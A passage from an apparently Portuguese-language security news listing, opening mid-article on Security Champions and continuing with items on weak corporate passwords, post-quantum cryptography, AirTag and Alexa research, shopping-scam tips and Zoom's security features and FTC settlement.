sozinho. Tudo é feito em colaboração com o time! Afinal, o papel do Security Champion não é o de centralizar o conhecimento - e sim, de disseminá-lo nas equipes. Como se tornar um Security Champion? Existe um perfil específico? É comum que Security Champions sejam desenvolvedores treinados e devidamente capacitados para suportar as iniciativas de segurança. No entanto, isso não é regra - é possível que profissionais egressos de outras áreas, mas com algum conhecimento em desenvolvimento, recebam treinamento para atuar como Security Champions caso cumpram outros requisitos. De todo modo, é preciso ressaltar que Security Champions não são profissionais de segurança de aplicações que são focados exclusivamente em segurança. Essa confusão é muito comum, mas é uma concepção errada. A escolha dos Security Champions dentro de cada time gera uma noção de pertencimento e ajuda no trabalho com os desenvolvedores. É imprescindível um trabalho cauteloso, que começa por um mapeamento de times. Para isso, é preciso identificar e capacitar membros dos times de desenvolvimento que tenham esse perfil, para que atuem como facilitadores de segurança. E este papel exige características comportamentais, como iniciativa e autogestão. Mas caso você sinta afinidade com essa carreira, esse já é um ótimo indício! Vagas na Conviso A Conviso, mantenedora aqui do Mente Binária, está com muitas vagas abertas. São vagas para áreas variadas dentro da empresa - de Desenvolvedor a Analista de Segurança da Informação. Caso você sinta afinidade com a especialidade da Conviso - Segurança de Aplicações - não deixe de se inscrever, ou mesmo de se cadastrar em nosso banco de talentos. É só clicar no botão abaixo:
  9. Pesquisadores da NordPass analisaram dados de violações públicas que afetaram empresas da Fortune 500 – lista que contém as 500 maiores corporações dos Estados Unidos – e descobriram que o maior facilitador dessas invasões é o uso de senhas fracas. Os dados analisados incluíram 15.603.438 violações e em 17 setores diferentes, e a lista de senhas foi compilada em parceria com uma empresa terceirizada, especializada em pesquisa de violação de dados. Entre as descobertas da empresa estão a frequência com que as senhas dessas empresas aparecem em violações de dados; qual o percentual de senhas exclusivas no setor; e quais são as principais senhas. Os pesquisadores apontam que 20% das senhas eram o nome exato da empresa ou sua variação, sendo que o setor de hospitalidade – hospedagem, serviço de alimentação e bebidas – detém a maioria desse tipo de senhas. “Password” ("senha", em inglês) também é uma das senhas mais populares em todas as indústrias mapeadas pela NordPass na pesquisa. Senhas com números sequenciais, como "123456", também são bem comuns em todos os setores, aponta a pesquisa. "As empresas e seus funcionários têm o dever de proteger os dados de seus clientes. Uma senha fraca de um funcionário poderia colocar em risco toda a empresa se um invasor usasse a senha violada para obter acesso a dados confidenciais”, disse Chad Hammond, especialista em segurança da NordPass, em comunicado à imprensa. A pesquisa também mostra o número de número de violações de dados que afetam cada setor, sendo que bens e consumo é a categoria com maior número de invasões, totalizado 942.289 violações. Os setores de finanças, telecomunicações, automotivo, aeroespacial, transporte e logística e hospitalidade também figuram entre os mais invadidos.
  10. Os computadores quânticos, se amadurecerem o suficiente, serão capazes de quebrar grande parte da criptografia atual, revelando comunicações privadas, dados de empresas e segredos militares. Segundo reportagem do CNet, os computadores quânticos atuais são muito primitivos para isso, mas os dados recolhidos agora ainda podem ser sensíveis quando eles se tornarem mais poderosos. Os computadores quânticos do futuro também poderão quebrar as assinaturas digitais que garantem a integridade das atualizações de aplicativos, navegadores, sistemas operacionais e outros softwares, abrindo um caminho para ataques de malware. Para o algoritmo de criptografia RSA de hoje, um computador convencional precisaria de cerca de 300 trilhões de anos para quebrar as comunicações protegidas com uma chave digital de 2.048 bits. Mas um computador quântico alimentado por 4.099 qubits precisaria de apenas 10 segundos. Essa é uma vulnerabilidade potencial da qual a indústria de computação está ciente, afirma a reportagem, sendo que algumas empresas estão em uma força-tarefa para criar, testar e adotar novos algoritmos de criptografia impermeáveis aos computadores quânticos. Algumas dessas empresas, incluindo IBM e Thales, já começaram a oferecer produtos protegidos pela chamada criptografia pós-quântica, diz o CNet. A criptografia quantum-safe será utilizada em laptops, telefones, navegadores da web e outros produtos atualizados, mas o problema mesmo será aplicá-la em empresas, governos e serviços de computação em nuvem, que devem projetar e instalar a tecnologia, promovendo uma mudança muito complexa. Empresas estão desenvolvendo computadores quânticos – Na Google I/O, conferência de programadores organizada anualmente pelo Google, realizada este mês, a empresa informou que um novo centro de computação quântica será criado com o objetivo de construir um computador quântico até 2029. Outras empresas de tecnologia, como Honeywell, IBM, Intel e a Microsoft também estão na corrida para construir os primeiros computadores quânticos. Enquanto isso, o Instituto Nacional de Padrões e Tecnologia dos Estados Unidos está liderando o esforço global para encontrar algoritmos de criptografia pós-quântica que sejam rápidos e confiáveis. Até o momento, o trabalho se concentra em duas tarefas de criptografia: troca de chaves digitais e adição de assinaturas digitais. Os algoritmos de criptografia exigem um exame minucioso antes que possam ser confiáveis para proteger senhas, números de cartão de crédito, registros financeiros e outras informações confidenciais. A transição quântica é mais difícil do que algumas atualizações de criptografia anteriores. Um dos problemas é os tamanhos das chaves digitais, que provavelmente serão maiores, exigindo mais memória para processá-los. Alterar algoritmos não será uma troca simples. Especialistas recomendam que seja feita uma abordagem híbrida que protege duplamente os dados com criptografia de segurança convencional e pós-quântica. (Imagem: IBM Q System One, primeiro computador quântico comercial de 20 qubits. Crédito da imagem: IBM)
  11. Depois de examinar 23 aplicativos Android, a Check Point Research (CPR) percebeu que mais de 100 milhões de usuários foram expostos. Isso ocorreu por conta de uma variedade de configurações incorretas deitas em serviços em nuvem de terceiros. Os dados pessoais expostos incluem e-mails, mensagens de bate-papo, localização, senhas e fotos. A Check Point descobriu os dados confidenciais disponíveis publicamente em bancos de dados em tempo real de 13 aplicativos Android, com o número de downloads de cada aplicativo variando de 10 mil a 10 milhões. Os bancos de dados em tempo real permitem que os desenvolvedores de aplicativos armazenem dados na nuvem, garantindo que sejam sincronizados em tempo real para todos os clientes conectados. O problema é que muitos desenvolvedores de aplicativos deixam seus dados e milhões de informações privadas de usuários expostos por não seguir as melhores práticas ao configurar e integrar serviços de nuvem de terceiros em seus aplicativos, diz a empresa de segurança. Essa configuração incorreta coloca em risco os dados pessoais dos usuários e os recursos internos dos desenvolvedores, como acesso a mecanismos de atualização, armazenamento e outros. Infelizmente, é comum que aplicativos altamente populares não imponham práticas básicas de segurança para proteger seus usuários e dados. A publicação completa da Check Point dá exemplos de alguns aplicativos com essa falha em sua configuração.
  12. O Google está lançando um novo recurso do Chrome no Android para ajudar os usuários a alterar as senhas comprometidas em violações de dados. Já faz algum tempo que o Chrome está verificando a segurança das senhas de usuários, e a partir do novo recurso, sempre que ele detectar uma violação, também poderá corrigir qualquer senha comprometida. Segundo publicação de Patrick Nepper, gerente de produto sênior, Google Chrome, sempre que o usuário verificar suas senhas e o Chrome encontrar uma que ela possa ter sido comprometida, um botão "Alterar senha" aparecerá no Assistente Google. Ao tocar no botão, o Chrome navegará até o site e passará por todo o processo de alteração da senha. Demonstração: Chrome ajuda na alteração de senhas comprometidas automaticamente (Fonte: Google) O usuário pode controlar toda a experiência e optar por passar pelo processo de alteração de senha manualmente desde o início ou a qualquer momento durante o processo. E mesmo se um site ainda não for compatível, o gerenciador de senhas do Chrome pode ajudar a criar senhas fortes para várias contas. O Chrome está usando uma tecnologia chamada Duplex na Web para potencializar esse recurso. Ela foi apresentada em 2019 para que o Google Assistente pudesse ajudar o usuário a realizar tarefas na Web. As alterações automatizadas de senha estão sendo implementadas gradualmente no Chrome no Android, para usuários que sincronizam suas senhas, começando nos Estados Unidos, sendo disponibilizada em mais sites e mais países nos próximos meses.
  13. No mês passado, a Apple lançou o AirTag, localizador que tem como objetivo ajudar os usuários a encontrarem objetos do dia a dia, como chaves ou mochila. E pesquisadores já saíram hackeando o novo device para encontrar possíveis falhas de segurança. Segundo reportagem da Vice, os AirTags usam beacons Bluetooth para compartilhar sua posição com qualquer iPhones próximo, transmitindo a posição AirTag para seu proprietário por meio do aplicativo Find My, da Apple. As desmontagens detalhadas foram publicadas pelo pesquisador de hardware Colin O'Flynn e por um pesquisador da empresa de reparos iFixIt. Um dos pesquisadores da Stacksmashing também publicou um vídeo no YouTube onde analisa as entranhas da AirTag. No vídeo, ele explica como ele encontrou uma maneira de modificar o firmware no AirTag – essencialmente desbloqueando-o – para enviá-lo a um URL malicioso para um iPhone que faz a varredura com NFC (comunicação por campo de proximidade, ou near-field communication). Esse pode ser o primeiro passo para permitir que as pessoas façam pesquisas de segurança no AirTag e no chip U1, segundo o pesquisador. Um pesquisador de segurança da Positive Security também descobriu que é possível transmitir dados arbitrários para dispositivos Apple próximos por meio do protocolo Find My. Segundo o pesquisador, ele fez isso "falsificando muitos AirTags e codificando dados nos quais o AirTag está ativo". Em seguida, ele fez o dispositivo carregar os dados como parte do relatório da localização do AirTag. A Vice informa que as descobertas não mostram nenhum risco imediato, mas é interessante ver o trabalho de pesquisadores de segurança, que têm como objetivo ajudar os fabricantes a manterem seus dispositivos seguros!
  14. O Google convidou seus usuários para ativação da verificação em duas etapas (2SV) – também conhecida como autenticação de dois fatores (2FA) – de suas contas nos dispositivos. Em publicação em seu blog, a empresa destaca que uma das melhores maneiras de proteger sua conta de uma senha violada ou incorreta é ter uma segunda forma de verificação em vigor. "O Google tem feito isso há anos, garantindo que sua conta do Google seja protegida por várias camadas de verificação. Hoje, pedimos às pessoas que se inscreveram na verificação em duas etapas que confirmem que são realmente elas com um simples toque por meio de um prompt do Google em seus telefones sempre que fizerem login", diz a publicação. Em breve, o Google começará a inscrever usuários automaticamente na 2SV se suas contas forem configuradas apropriadamente. A empresa afirma que também está criando tecnologias de segurança avançadas em dispositivos para tornar essa autenticação multifatorial ainda mais segura do que uma senha. "Criamos nossas chaves de segurança diretamente em dispositivos Android e lançamos nosso aplicativo Google Smart Lock para iOS, então agora as pessoas podem usar seus telefones como sua forma secundária de autenticação". A autenticação de dois fatores é uma maneira de reforçar a proteção de senhas através da identificação aos usuários por uma combinação de dois componentes diferentes. Esse é um mecanismo importante para proteger contas de possíveis invasões. Em artigo, o Fernando Mercês explica que a 2FA está entre os passos primordiais que qualquer usuário deve dar para se proteger, inclusive, de um eventual roubo de seu dispositivo que pode deixar suas contas vulneráveis aos invasores:
  15. Um grupo de acadêmicos da Ruhr-Universität Bochum e da North Carolina State University descobriram riscos de privacidade e segurança no ecossistema de habilidades da assistente de voz Alexa, bem como inconsistências no processo de verificação dessas skills. Segundo o The Hacker News, foram analisadas 90.194 habilidades do ecossistema Alexa Skills, disponíveis em sete países, incluindo os EUA, Reino Unido, Austrália, Canadá, Alemanha, Japão e França. As falhas estão no processo de verificação de habilidades da Amazon para o ecossistema da Alexa. Essas vulnerabilidades podem permitir que um agente malicioso publique uma habilidade enganosa, em nome de qualquer desenvolvedor arbitrário, ou até mesmo faça alterações no código de back-end para induzir os usuários a fornecerem informações confidenciais. Isso acontece porque a Amazon permite que desenvolvedores terceirizados criem funcionalidades adicionais para dispositivos, como os alto-falantes Echo, configurando "habilidades" que são executadas em cima da assistente de voz. O objetivo seria facilitar que os usuários iniciem uma conversa com a habilidade e concluam uma tarefa específica. Contudo, a preocupação é que um usuário possa ativar uma habilidade errada. A armadilha vem do fato de que várias habilidades podem ter a mesma frase de invocação. Os pesquisadores alertam que a Amazon atualmente não emprega nenhuma abordagem automatizada para detectar infrações para o uso de marcas registradas de terceiros, dependendo de verificação manual para detectar tais tentativas maliciosas. Eles afirmam ainda que um invasor pode fazer alterações no código após a aprovação de uma habilidade para persuadir um usuário a revelar informações confidenciais, como números de telefone e endereços. Por conta desses riscos, os usuários são aconselhados a ter cuidado com as habilidades que escolhem instalar em seus dispositivos. Amazon rejeita alegações sobre falha de segurança – O Threatpost informa que a Amazon enviou declaração afirmando conduzir análises de segurança como parte da certificação de habilidades, dizendo ainda que possui sistemas para monitorar continuamente habilidades ao vivo em busca de comportamento potencialmente malicioso. "A segurança de nossos dispositivos e serviços é uma prioridade máxima”, disse o porta-voz da Amazon. “Todas as habilidades ofensivas que identificamos são bloqueadas durante a certificação ou rapidamente desativadas. Estamos constantemente aprimorando esses mecanismos para proteger ainda mais nossos clientes. Agradecemos o trabalho de pesquisadores independentes que nos ajudam a trazer problemas em potencial". Notícia atualizada em 1/03/2021 às 14h10
  16. A rede social baseada em áudio ClubHouse supostamente está passando por problemas de segurança. Segundo o ThreatPost, pesquisadores afirmam que as conversas que ocorrem no aplicativo estão sendo gravadas. Aparentemente um usuário foi capaz de violar feeds de áudio de salas do ClubHouse e transmiti-los em um site. Outro usuário também supostamente escreveu um código que permite que qualquer pessoa ouça as conversas do ClubHouse sem o convite necessário para entrar na rede social. Outros códigos maliciosos projetados para violar o ClubHouse também foram bloqueados, dizem as informações. O ThreatPost destaca que os problemas de segurança do ClubHouse estão na plataforma de engajamento de voz e vídeo em tempo real fornecida pela startup Agora, com sede em Xangai. O tráfego do app é direcionado ao servidor da empresa na China, incluindo metadados pessoais, sem criptografia, de acordo com o Stanford Internet Observatory (SIO), que foi o primeiro a alertar sobre a privacidade do ClubHouse e as proteções de segurança da rede social. Assim, os usuários do ClubHouse devem estar cientes de que seus dados provavelmente estão expostos. 😒
  17. Bruna Chieco

    DISI'21

    A 15ª edição do Dia Internacional de Segurança em Informática (DISI) acontecerá no dia 11 de fevereiro, a partir das 16h, em formato online e gratuito. O evento terá como tema “Segurança digital começa cedo”. O DISI é realizado anualmente pela Rede Nacional de Ensino e Pesquisa (RNP), vinculada ao Ministério da Ciência, Tecnologia e Inovações (MCTI), e este ano o evento se soma ao Dia da Internet Segura (saferinternetday.org), movimento global liderado no Brasil pela Safernet e o Núcleo de Informação e Coordenação do Ponto BR - NIC.br. O objetivo é trazer maior mobilização em torno de temas importantes para o uso mais seguro e consciente da Internet. Esta edição do DISI contará com duas horas e meia de duração e reunirá vozes ativas do mundo digital em uma roda de conversa para compartilhar seus conhecimentos e, dessa forma, conscientizar usuários de Internet sobre segurança da informação. O evento é direcionado a estudantes, professores, colaboradores de instituições, profissionais de tecnologia, especialistas e demais disseminadores da cultura de segurança da informação. Inscreva-se: http://conteudo.rnp.br/disi-2021/
  18. Como um aquecimento para o Cyberwomen Challenge, será realizado no dia 10 de fevereiro um Painel de Tecnologia com executivas do mercado de TI que tratarão de práticas de gestão, investigação e mais. O evento abordará os seguintes tópicos para interagir e participar: Case de investigação de crimes cibernéticos Q&A Painel sobre mulheres em tecnologia O Painel de Tecnologia terá a presença de: Leticia Gammil – Presidente Womcy Latam Rayanne Nunes – Coordenadora de Tecnologia Trend Micro Tamires Almeida - Líder de Mentoring Womcy Claudia Anania – Head de TI, Instituto Butantan Barbara Marchiori - Consultora da OEA Saiba mais: https://resources.trendmicro.com/Inscricao_Painel_de_Tecnologia_2021.html?utm_source=LINKEDIN&utm_medium=Social&utm_content=202011274247482245&utm_campaign=General+Marketing&linkId=105626945
  19. O Cyberwomen Challenge, organizado pela Trend Micro, Organização dos Estados Americanos (OEA) e o Governo do Reino Unido, com apoio da Womcy, é um desafio voltado para mulheres que estão começando sua carreira e querem mostrar seu talento. As participantes terão a oportunidade de vivenciar situações realistas de cibersegurança, aprendendo em um workshop virtual a lidar com migração de aplicações, apps de orquestração e uso de Security as Code. O workshop técnico online será baseado em simulações de cibersegurança e cenários reais com a orientação de um especialista, focado na adoção de novas tecnologias exclusivas dando a oportunidade de viver a experiência de uma migração de aplicações para novas tecnologias como containers, orquestradores e como usar a segurança como código para facilitar a implementação de uma nova estratégia de segurança. Todas as participantes receberão kits de participação e terão a oportunidade de fazer networking com pessoas da área. Além disso, o desafio concederá uma premiação para o grupo primeiro colocado, composta por um curso relacionado à área do desafio, a ser confirmado pela organização até a data de início do evento; licenças de Antivírus da Trend Micro por um ano; e mentoria de Carreira realizada pela equipe Womcy Mentoring. Inscreva-se: https://resources.trendmicro.com/CyberwomenChallenge2021-Brasil.html#Agenda
  20. O ano está acabando e provavelmente você ainda deve estar fazendo aquela comprinhas para aproveitar as festas que vem por aí nos próximos dias. Por isso, preparamos mais algumas dicas de como se proteger em compras online para que você evite cair em fraudes e golpes, que podem ser ainda mais comuns em um período em que o e-commerce está em alta – e os criminosos estão de olho. Antes de realizar qualquer compra, verifique a autenticidade da loja. Uma pesquisa no Reclame Aqui ou uma lida no Sobre Nós da loja é válida para que você veja se aquele e-commerce é confiável mesmo ou se não está copiando uma descrição de outro site – que pode ser também tão fake quanto. Produtos com preços abaixo do normal são sempre um sinal de alerta. Não acredite em promoções de sites não conhecidos e pesquise bem antes de fechar a compra. Evite colocar dados de cartão de crédito em sites e aplicativos que não são utilizados por você com frequência. O cartão de crédito virtual pode ser uma boa opção, por ser usado uma única vez, se você preferir, evitando clonagem. Se optar por boleto ou transferência em uma compra de um lugar que você não conhece muito bem, verifique a identificação do beneficiário antes de confirmar transações. Nunca acredite em mensagens de SMS que pedem que você digite códigos de verificação. Esse é um golpe clássico que pode roubar seu WhatsApp, por exemplo, e sendo que é muito comum os criminosos usarem essa tática para depois extorquir vítimas se passando pelo dono da conta, pedindo dinheiro a familiares e amigos. E em um ano adverso como este, com a pandemia reduzindo a possibilidade de reuniões e encontros presenciais, pode ser que você, seus familiares e amigos optem por utilizar aplicativos de chamada de videoconferência para ficar junto, ainda que virtualmente. O Zoom, por exemplo, plataforma que se tornou muito popular neste período tanto para reuniões empresariais quanto para confraternizações, retirou o limite de 40 minutos para videoconferências no Natal e no Ano Novo. Assim, a partir de hoje, 23 de dezembro, até 26 de dezembro; e depois entre os dias 30 de dezembro e 2 de janeiro, as reuniões via Zoom serão ilimitadas. Para aproveitar esse benefício de maneira mais tranquila e segura, é importante gerar reuniões com senhas, mantendo assim a maior privacidade e evitando invasores e participantes desconhecidos. Fique atento a esses detalhes para aproveitar um fim de 2020 com segurança. Boas festas!
  21. Uma ampla coalizão de especialistas da indústria, governo, agentes da lei, organizações sem fins lucrativos, empresas de seguro de segurança cibernética e organizações internacionais formou a Força-Tarefa de Ransomware (Ransomware Task Force – RTF) para lidar com ataques de ransomware. O grupo é formado por 19 nomes da área de segurança, incluindo o Institute for Security and Technology (IST). A RFT fará um sprint de dois a três meses para avaliar as soluções existentes em vários níveis da cadeia de eliminação do ransomware, identificando lacunas na aplicação da solução e criando um roteiro de objetivos concretos e marcos acionáveis para tomadores de decisão de alto nível. A Força-Tarefa encomendará ainda artigos de especialistas, envolvendo as partes interessadas em todos os setores para se unirem em torno de soluções avaliadas. Os parceiros fundadores da Força-Tarefa de Ransomware são: Aspen Digital Citrix The Cyber Threat Alliance Cybereason The CyberPeace Institute The Cybersecurity Coalition The Global Cyber Alliance The Institute for Security and Technology McAfee Microsoft Rapid7 Resilience SecurityScorecard Shadowserver Foundation Stratigos Security Team Cymru Third Way UT Austin Stauss Center Venable LLP A coalizão foi criada a partir do entendimento de que o ransomware é uma ameaça muito grande para qualquer entidade abordar sozinha. Assim, o grupo decidiu se reunir para fornecer recomendações claras sobre ações públicas e privadas que podem reduzir significativamente a ameaça representada pelo ransomware. Ao longo do tempo, esses ataques têm atingido principalmente hospitais, distritos escolares, governos municipais, além de empresas, que ficam reféns dos criminosos que buscam pagamentos para liberarem dados sequestrados. "Os incidentes de ransomware têm crescido sem controle e esse crime cibernético economicamente destrutivo tem cada vez mais consequências físicas perigosas", diz comunicado do IST. "Este crime transcende setores e requer trazer todas as partes interessadas afetadas à mesa para sintetizar uma estrutura clara de soluções viáveis, razão pela qual o IST e nossa coalizão de parceiros estão lançando esta Força-Tarefa", complementa o Instituto. O site da RTF, incluindo membros e funções de liderança, será lançado em janeiro de 2021.
  22. A Black Friday está chegando nesta sexta-feira, dia 27 de novembro, prometendo descontos e promoções em muitas lojas. Nessa data também é comum nos depararmos com golpes ou fraudes por conta do volume de compras e acesso que os consumidores fazem a sites de comércio eletrônico. Por isso, preparamos aqui algumas dicas para que você não caia no que muita gente chama de "Black Fraude". 1. Lojas falsas Alguns golpistas podem se aproveitar do momento para abrir lojas falsas. Para evitar esse tipo de golpe, é importante verificar se o CNPJ da empresa está ativo por meio do site da Receita Federal e dar aquela olhadinha em sites como Reclame Aqui para consultar a reputação da empresa. O Procon também contém uma lista de sites para serem evitados, vale conferir. Outra maneira de identificar as lojas falsas é pesquisando um pouco mais sobre elas caso você não a conheça. Vale jogar no Google o nome da loja ou até os produtos e o próprio texto de apresentação da marca para validar se é verdadeiro ou se não é cópia de algum outro lugar. No exemplo abaixo, identificamos duas loja com o exato mesmo texto de apresentação na aba "Sobre nós". Os sites, inclusive, têm um design muito parecido: 2. Preços (pouco) abaixo do normal Algumas ofertas podem conter um preço abaixo do normal, e se você encontrar um produto assim, desconfie. Faça o mesmo procedimento anterior: pesquise um pouco mais sobre a loja e o douro antes de fechar a compra. O Google Chrome está oferecendo uma ferramenta do Reclame Aqui que ajuda na identificação de promoções com análise do histórico de preços para saber se aquela oferta é uma oferta mesmo ou se o histórico de preço do produto diz o contrário. Basta instalar a extensão no Chrome e, quando entrar em alguma oferta, clicar no Confie Aqui. 3. Mensagens de texto no celular com links Mensagens de texto que enviam algum tipo de link ou pedem códigos de verificação são sempre suspeitas em qualquer situação. Golpistas utilizam essa tática para acessar o WhatsApp da vítima, por exemplo, e partir daí extorquir os contatos salvos pedindo dinheiro em nome do dono da conta. 4. Ofertas tentadoras por e-mail Nunca clique nas ofertas por email. Se a oferta for tentadora, vá ao site em questão digitando o endereço no navegador e busque-a. 5. Anexos ou links suspeitos em e-mails Anexos ou links suspeitos podem ser golpes de phishing, direcionando o consumidor a um site malicioso que parece real na hora de fechar uma compra ou enviar uma "promoção". O site é idêntico ao original, mas não é verdadeiro. Toda atenção é pouca. Fique de olho também no nome de domínio do remetente do e-mail para verificar se é oficial mesmo da loja/empresa da qual você está fazendo a compra.
  23. Com o isolamento social decorrente da pandemia de COVID-19, o uso de plataformas de videoconferência para aulas e reuniões aumentou exponencialmente no mundo todo. Junto com isso, começou a surgir um tipo de invasão nessas reuniões, chamada de Zoombombing, quando as reuniões do Zoom são invadidas por terceiros não autorizados com o objetivo de interromper as sessões em andamento e assediar os participantes. Para evitar esse tipo de perturbação, o Zoom anunciou o lançamento de dois novos recursos de segurança para remover e relatar participantes perturbadores das reuniões: - Suspender Atividades Participantes: no ícone Segurança, os anfitriões (hosts) e co-anfitriões (co-hosts) agora têm a opção de pausar temporariamente a reunião e remover um participante que atrapalha. Ao clicar em “Suspender Atividades do Participante”, todos os vídeos, áudio, bate-papo em reunião, anotações, compartilhamento de tela e gravação durante esse período serão interrompidos e as salas de sessão de grupo serão encerradas. Os hosts ou co-organizadores serão questionados se gostariam de denunciar um usuário de sua reunião, compartilhar quaisquer detalhes e, opcionalmente, incluir uma captura de tela. Depois de clicar em "Enviar", o usuário denunciado será removido da reunião e a equipe de segurança do Zoom será notificada. Os anfitriões e co-anfitriões podem, assim, retomar sua reunião, reativando individualmente os recursos que gostariam de usar. O Zoom também enviará um e-mail após a reunião para coletar mais informações. O recurso Suspender Atividades do Participante é habilitado por padrão para todos os usuários gratuitos e pagos do Zoom. - Relatório dos participantes: além dos hosts e co-hosts poderem relatar usuários a partir do ícone Segurança, os participantes da reunião também podem, clicando na ferramenta de Segurança do lado superior esquerdo da tela. Proprietários de contas e administradores podem habilitar recursos de relatório para não hosts em suas configurações da web. Os novos recursos estão disponíveis nos clientes de desktop Zoom para Mac, PC e Linux, e em nossos aplicativos móveis, com suporte para o cliente da web e VDI que virá ainda este ano. - Notificador de reunião em risco: o Zoom implantou também um Notificador de reunião em risco para verificar postagens de mídia social pública e outros sites em busca de links de reunião Zoom compartilhados publicamente. Quando a ferramenta detecta uma reunião que parece ter alto risco de ser interrompida, ela alerta automaticamente o proprietário da conta por e-mail e fornece conselhos sobre o que fazer. Essas etapas podem incluir a exclusão da reunião vulnerável e a criação de uma nova com uma nova ID de reunião, habilitando as configurações de segurança ou usando outra solução, como webinars do Zoom ou OnZoom. Ao receber um e-mail, o Zoom recomenda agir, ou haverá o risco de ter a reunião interrompida.
  24. A Federal Trade Commission (FTC) fez um acordo com o Zoom após acusar a empresa de videochamadas de se envolver em "uma série de práticas enganosas e injustas que minaram a segurança de seus usuários". Segundo a FTC, o Zoom alegava que sua criptografia era mais forte do que realmente era. Em acordo, a FTC exige que a empresa implemente um programa robusto de segurança da informação para resolver as acusações. A FTC alega que o Zoom manteve as chaves criptográficas que poderiam permitir à empresa acessar o conteúdo das reuniões de seus clientes, e que suas reuniões tinham um nível de criptografia inferior ao prometido. “As alegações enganosas do Zoom deram aos usuários uma falsa sensação de segurança, de acordo com a reclamação da FTC, especialmente para aqueles que usaram a plataforma da empresa para discutir tópicos delicados, como saúde e informações financeiras”, diz a FTC. Segundo a FTC, pelo menos desde 2016, o Zoom enganou os usuários ao anunciar que oferecia "criptografia ponta-a-ponta de 256 bits" para proteger as comunicações dos usuários, quando na verdade fornecia um nível inferior de segurança. A criptografia ponta-a-ponta é um método de proteger as comunicações de forma que apenas o remetente e os destinatários, e nenhuma outra pessoa, nem mesmo o provedor da plataforma, possa ler o conteúdo. O Zoom admitiu o erro, segundo o TechCrunch, levando a empresa a lançar um esforço de recuperação de 90 dias, que incluiu a implementação de criptografia ponta-a-ponta para seus usuários. Isso acabou sendo lançado no final de outubro, mas inicialmente dizendo que os usuários gratuitos não poderiam usar criptografia. A FTC também alegou que o Zoom armazenou algumas gravações de reuniões não criptografadas em seus servidores por até dois meses e comprometeu a segurança de seus usuários ao instalar secretamente um servidor web chamado ZoomOpener nos computadores de seus usuários para que eles entrassem nas reuniões mais rapidamente. O Zoom lançou uma atualização que removeu o servidor web, e a Apple também interveio para remover o componente vulnerável dos computadores de seus clientes. Em sua declaração, a FTC disse que proibiu a Zoom de deturpar suas práticas de segurança e privacidade no futuro, e concordou em iniciar um programa de gerenciamento de vulnerabilidade e implementar uma segurança mais forte em sua rede interna. O porta-voz da Zoom, Colleen Rodriguez, disse em um comunicado que o Zoom "já tratou dos problemas identificados pela FTC".
×
×
  • Create New...